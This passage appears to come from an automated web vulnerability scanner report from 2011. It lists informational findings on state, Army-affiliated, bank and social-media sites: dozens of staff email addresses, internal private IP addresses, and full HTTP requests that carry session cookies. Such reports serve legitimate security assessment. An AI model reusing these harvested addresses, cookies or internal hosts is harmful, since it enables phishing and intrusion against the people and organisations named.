Referer: https://www.ri.gov/Licensing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:04 GMT
Server: www
Last-Modified: Fri, 09 Nov 2007 16:29:17 GMT
ETag: "aea-43e817be2b140"
Accept-Ranges: bytes
Content-Length: 2794
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* Purpose: Font sizer class, handles increasing and decreasing font size of a page.
* It increases the font in 10% increments. By getting the level / 10 + 1.
*
...[SNIP]...
it(options); the two options are
* min and max, for the min level and max level.
* Defaults are min: -3 and max: 5.
*
* Author: Stefan Sedich (stefan.sedich@gmail.com
*/

$jquery = jQuery;

$jquery.FontSizer = {

options : {
level: 0,
min: -3,
max: 5
},

Init : function(options) {

...[SNIP]...

19.65. https://www.ri.gov/js/jquery_cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/js/jquery_cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery_cookie.js HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/Licensing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:04 GMT
Server: www
Last-Modified: Mon, 09 May 2011 18:30:16 GMT
ETag: "f61-4a2dc07e81e00"
Accept-Ranges: bytes
Content-Length: 3937
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.66. https://www.ri.gov/styles/ui-widgets.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/styles/ui-widgets.css

Issue detail

The following email address was disclosed in the response:

licensing@wijmo.com

Request

GET /styles/ui-widgets.css HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/Licensing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:04 GMT
Server: www
Last-Modified: Wed, 25 May 2011 19:33:37 GMT
ETag: "36d5-4a41ec7ecc640"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14037
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/css

/*
*
* Wijmo Aristo Theme
* http://wijmo.com/
*
* Copyright(c) ComponentOne, LLC. All rights reserved.
*
* Dual licensed under the MIT or GPL Version 2 licenses.
* licensing@wijmo.com
* http://www.wijmo.com/license
*
* Based on the Aristo theme concept created by 280 North and Pinvoke (https://github.com/280north/aristo).
*
*/

/* Layout helpers
----------------------
...[SNIP]...

19.67. http://www.riema.ri.gov/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.riema.ri.gov
Path:	/contact/

Issue detail

The following email addresses were disclosed in the response:

Denise.Fernandes@us.army.mil
Edward.w.Johnson1@us.army.mil
Kenneth.S.Dumais.ctr@us.army.mil
Michael.Walsh14@us.army.mil
Norm.Menard@us.army.mil
Paul.Budzenski@us.army.mil
Ricky.Jones@us.army.mil
Steve.Kass@us.army.mil
andrea.l.tatro.ctr@us.army.mil
armand.randolph@us.army.mil
bgreenwood@gov.state.ri.us
bronwyn.gordon@us.army.mil
dorian.boardman@us.army.mil
ellary.w.gamache@us.army.mil
emily.pysh@us.army.mil
eva.zito@us.army.mil
james.d.smith18@us.army.mil
james.francis.baker@us.army.mil
john.washburn4@us.army.mil
joseph.p.cournoyer@us.army.mil
joseph.swift1@us.army.mil
kenneth.l.baker1@us.army.mil
kevin.d.clapp@us.army.mil
lawrence.macedo@us.army.mil
melanie.catineault@us.army.mil
michelle.f.burnett@us.army.mil
michelle.sansouci@us.army.mil
pamela.j.leary.ctr@us.army.mil
paula.carlton@us.army.mil
pdabbraccio@gov.state.ri.us
ralph.bubariii@us.army.mil
raymond.laprad@us.army.mil
regional.response@ri.necoxmail.com
robert.sturdahl@us.army.mil
sandra.cabral@us.army.mil
sarah.n.pucino.ctr@us.army.mil
stephen.a.conard.ctr@us.army.mil
steven.greenhalgh@us.army.mil
theresa.c.murray@us.army.mil
todd.tinkham@us.army.mil

Request

GET /contact/ HTTP/1.1
Host: www.riema.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.riema.ri.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-Type" content="text/html; charset=iso-8859-1">
<m
...[SNIP]...
<a href="mailto:james.d.smith18@us.army.mil">
...[SNIP]...
<a href="mailto:Edward.w.Johnson1@us.army.mil">
...[SNIP]...
<a href="mailto:todd.tinkham@us.army.mil">
...[SNIP]...
<a href="mailto:james.francis.baker@us.army.mil">
...[SNIP]...
<a href="mailto:kenneth.l.baker1@us.army.mil">
...[SNIP]...
<a href="mailto:dorian.boardman@us.army.mil">
...[SNIP]...
<a href="mailto:ralph.bubariii@us.army.mil">
...[SNIP]...
<a href="mailto:Paul.Budzenski@us.army.mil">
...[SNIP]...
<a href="mailto:michelle.f.burnett@us.army.mil">
...[SNIP]...
<a href="mailto:sandra.cabral@us.army.mil">
...[SNIP]...
<a href="mailto:paula.carlton@us.army.mil">
...[SNIP]...
<a href="mailto:melanie.catineault@us.army.mil">
...[SNIP]...
<a href="mailto:kevin.d.clapp@us.army.mil">
...[SNIP]...
<a href="mailto:stephen.a.conard.ctr@us.army.mil">
...[SNIP]...
<a href="mailto:joseph.p.cournoyer@us.army.mil">
...[SNIP]...
<a href="mailto:pdabbraccio@gov.state.ri.us">
...[SNIP]...
<a href="mailto:Kenneth.S.Dumais.ctr@us.army.mil">
...[SNIP]...
<a href="mailto:Denise.Fernandes@us.army.mil">
...[SNIP]...
<a href="mailto:ellary.w.gamache@us.army.mil">
...[SNIP]...
<a href="mailto:steven.greenhalgh@us.army.mil">
...[SNIP]...
<a href="mailto:bgreenwood@gov.state.ri.us">
...[SNIP]...
<a href="mailto:Ricky.Jones@us.army.mil">
...[SNIP]...
<a href="mailto:Steve.Kass@us.army.mil">
...[SNIP]...
<a href="mailto:raymond.laprad@us.army.mil">
...[SNIP]...
<a href="mailto:pamela.j.leary.ctr@us.army.mil">
...[SNIP]...
<a href="mailto:lawrence.macedo@us.army.mil">
...[SNIP]...
<a href="mailto:Norm.Menard@us.army.mil">
...[SNIP]...
<a href="mailto:theresa.c.murray@us.army.mil">
...[SNIP]...
<a href="mailto:regional.response@ri.necoxmail.com">
...[SNIP]...
<a href="mailto:sarah.n.pucino.ctr@us.army.mil">
...[SNIP]...
<a href="mailto:emily.pysh@us.army.mil">
...[SNIP]...
<a href="mailto:bronwyn.gordon@us.army.mil">
...[SNIP]...
<a href="mailto:armand.randolph@us.army.mil">
...[SNIP]...
<a href="mailto:michelle.sansouci@us.army.mil">
...[SNIP]...
<a href="mailto:robert.sturdahl@us.army.mil">
...[SNIP]...
<a href="mailto:joseph.swift1@us.army.mil">
...[SNIP]...
<a href="mailto:andrea.l.tatro.ctr@us.army.mil">
...[SNIP]...
<a href="mailto:Michael.Walsh14@us.army.mil">
...[SNIP]...
<a href="mailto:john.washburn4@us.army.mil">
...[SNIP]...
<a href="mailto:eva.zito@us.army.mil">
...[SNIP]...

19.68. http://www.riema.ri.gov/js/jquery.cdc.ticker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.riema.ri.gov
Path:	/js/jquery.cdc.ticker.js

Issue detail

The following email address was disclosed in the response:

mike@mikeauclair.com

Request

GET /js/jquery.cdc.ticker.js HTTP/1.1
Host: www.riema.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.riema.ri.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Sep 2010 19:07:35 GMT
ETag: "ae002f-d79-86e02bc0"
Accept-Ranges: bytes
Content-Length: 3449
Content-Type: application/x-javascript

/*
* jQuery CDC Ticker
* by Mike Auclair
* mike@mikeauclair.com
*
* Copyright (c) 2010 Mike Auclair
* Licensed under the GPL (gpl-2.0.txt) license.
*
* NOTE: This plugin depends on jQuery. Download jQuery at www.jquery.com
*
*/

/*
SCRATCH PAD
...[SNIP]...

19.69. http://www.us-cert.gov/cas/tips/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.us-cert.gov
Path:	/cas/tips/

Issue detail

The following email addresses were disclosed in the response:

cert@cert.org
soc@us-cert.gov

Request

GET /cas/tips/ HTTP/1.1
Host: www.us-cert.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:40:08 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 13035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cyber Security Tips
...[SNIP]...
<a href="mailto:cert@cert.org?cc=soc@us-cert.gov" title="Report a Vulnerability">
...[SNIP]...

20. Private IP addresses disclosed previous next
There are 24 instances of this issue:

http://blogs.adobe.com/psirt/
http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories
http://blogs.adobe.com/psirt/category/uncategorized
https://iblogin.jpmorgan.com/sso/morcom/css/style.css
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/LHnm6CafkJe.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/2YGnqSRbxUI.css
https://store.popcap.com/payment.php
http://www.facebook.com/ajax/connect/connect_widget.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/sdch/vD843DpA.dct
https://www.lowes.com/server-status
https://www.lowes.com/server-status
http://www.us-cert.gov/cas/tips/

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://blogs.adobe.com/psirt/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.adobe.com
Path:	/psirt/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.1.106.16
10.2.152.33
10.2.153.1
10.2.154.18
10.2.154.25
10.2.156.12
10.3.181.16
10.3.185.22

Request

GET /psirt/ HTTP/1.1
Host: blogs.adobe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26F74D83051D0DDF-60000136C0065565[CE]; _uopt=storesUS%2Cbusstore_us; TID=--FCRWM

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://blogs.adobe.com/psirt/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 32425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Adobe Product S
...[SNIP]...
</a>security issue (CVE-2011-2107) in Adobe Flash Player 10.3.181.16 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.22 and earlier versions for Android. Adobe recommends users apply the updates for their product installations.</p>
...[SNIP]...
</a> security issue (CVE-2011-0611) in Adobe Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, as referenced in <a href="http://www.adobe.com/support/security/advisories/apsa11-02.html">
...[SNIP]...
</a> vulnerability that exists in Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 10.2.156.12 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems. This
...[SNIP]...
</a>. This Security Bulletin affects Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. Adobe recommends users apply the updates for their product installations.</p>
...[SNIP]...

20.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.adobe.com
Path:	/psirt/category/security-bulletins-and-advisories

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.1.106.16
10.2.152.33
10.2.153.1
10.2.154.18
10.2.154.25
10.2.156.12
10.3.181.16
10.3.185.22

Request

GET /psirt/category/security-bulletins-and-advisories HTTP/1.1
Host: blogs.adobe.com
Proxy-Connection: keep-alive
Referer: http://blogs.adobe.com/psirt/category/uncategorized/page/3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26F74D83051D0DDF-60000136C0065565[CE]; _uopt=storesUS%2Cbusstore_us; TID=--FCRWM; mbox=check#true#1310503337|session#1310503220593-437542#1310505137; s_cc=true; s_sq=mxmacromedia%3D%2526pid%253Dhttp%25253A%25252F%25252Fblogs.adobe.com%25252Fpsirt%25252Fcategory%25252Funcategorized%25252Fpage%25252F3%2526oid%253Dhttp%25253A%25252F%25252Fblogs.adobe.com%25252Fpsirt%25252Fcategory%25252Fsecurity-bulletins-and-advisories%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:41:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://blogs.adobe.com/psirt/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 32879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Security Bulleti
...[SNIP]...
</a>security issue (CVE-2011-2107) in Adobe Flash Player 10.3.181.16 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.22 and earlier versions for Android. Adobe recommends users apply the updates for their product installations.</p>
...[SNIP]...
</a> security issue (CVE-2011-0611) in Adobe Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, as referenced in <a href="http://www.adobe.com/support/security/advisories/apsa11-02.html">
...[SNIP]...
</a> vulnerability that exists in Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 10.2.156.12 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems. This
...[SNIP]...
</a>. This Security Bulletin affects Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. Adobe recommends users apply the updates for their product installations.</p>
...[SNIP]...

20.3. http://blogs.adobe.com/psirt/category/uncategorized previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.adobe.com
Path:	/psirt/category/uncategorized

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.45.2
10.1.53.64
10.1.85.3
10.1.95.2

Request

GET /psirt/category/uncategorized HTTP/1.1
Host: blogs.adobe.com
Proxy-Connection: keep-alive
Referer: http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26F74D83051D0DDF-60000136C0065565[CE]; _uopt=storesUS%2Cbusstore_us; TID=--FCRWM; mbox=check#true#1310503348|session#1310503220593-437542#1310505148; s_cc=true; s_sq=mxmacromedia%3D%2526pid%253Dhttp%25253A%25252F%25252Fblogs.adobe.com%25252Fpsirt%25252Fcategory%25252Fsecurity-bulletins-and-advisories%2526oid%253Dhttp%25253A%25252F%25252Fblogs.adobe.com%25252Fpsirt%25252Fcategory%25252Funcategorized%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:42:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://blogs.adobe.com/psirt/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 35654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Uncategorized &l
...[SNIP]...
</a> vulnerability exists in Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems; Adobe Flash Player 10.1.95.2 and earlier versions for Android; and the authplay.dll component that ships with Adobe Reader 9.4 and earlier 9.x versions for Windows, Macintosh and UNIX operating systems, and Adobe Acrobat 9.4 and
...[SNIP]...
</a>. This update includes an earlier version of Adobe Flash Player (version 10.0.45.2) than available from <a href="http://www.adobe.com/go/getflashplayer">
...[SNIP]...
X v10.6.4 update does not appear to downgrade users who have already upgraded to Adobe Flash Player 10.1, Adobe recommends users verify they are using the latest, most secure version of Flash Player (10.1.53.64) available for download from <a href="http://www.adobe.com/go/getflashplayer">
...[SNIP]...

20.4. https://iblogin.jpmorgan.com/sso/morcom/css/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/morcom/css/style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.9.122

Request

GET /sso/morcom/css/style.css HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
Referer: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmorcom.jpmorgan.com%2fIB%2fPostTrade%2fMORCOM&msg=+&securityLevel=300&ignorespnego=true&app=254651&ref=289733&cs=sYFeaoWWJKVj2jkatj0PGjSkwwc%3d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:18 GMT
Server: Apache
ETag: W/"20061-1310214431000"
Last-Modified: Sat, 09 Jul 2011 12:27:11 GMT
Content-Length: 20061
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

html {

   background-image: url(../images/bg/header.jpg);
   background-repeat: repeat-x;
}
.frame {
   border: 1px solid #c3c3c3;
}

.clear {
   clear: both;
}

html, body, #wrap {height: 100%;}
body > #wr
...[SNIP]...
a:hover {
               text-decoration: underline;
           }

   #footer div.right {
       float: right;
       display: inline;
       padding-top: 6px;
   }


       /* ------------------------------- login page definitions http://192.168.9.122/ibsg_brown/janus_login.html-------------------------------------------- */

html.login, html.login #header {
   background-image: none;
}
   html.login #header {
       height: 50px;
       background-color: #321b0
...[SNIP]...

20.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.63.75

Request

GET /www/app_full_proxy.php?app=110284481587&v=1&size=z&cksum=8f6b93fac1a0465fb1669f6bf6194b6a&src=http%3A%2F%2Fupload.contextoptional.com%2Fupload%2F20110706181601.png HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.43.63.75
X-Cnection: close
Content-Length: 21404
Cache-Control: public, max-age=31111079
Expires: Fri, 06 Jul 2012 18:34:03 GMT
Date: Tue, 12 Jul 2011 16:36:04 GMT
Connection: close

.PNG
.
...IHDR...Z...L......'......gAMA......a.....sRGB.@.}...
#iCCPicm..x...WTS....9'......7C/.DJh..E.....%`H..."*8..H....8.X...".mP.. 2(..........k..;....o.o....~.......2.rYd.?........z. f`$..d.
...[SNIP]...

20.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.172.47

Request

GET /www/app_full_proxy.php?app=237431116274613&v=1&size=z&cksum=88fdfcbe4c6301eba03df04be3de2e02&src=http%3A%2F%2Fupload.contextoptional.com%2Fupload%2F20110706133000.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.54.172.47
X-Cnection: close
Content-Length: 5051
Cache-Control: public, max-age=31438399
Expires: Tue, 10 Jul 2012 13:29:23 GMT
Date: Tue, 12 Jul 2011 16:36:04 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

20.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.30.37

Request

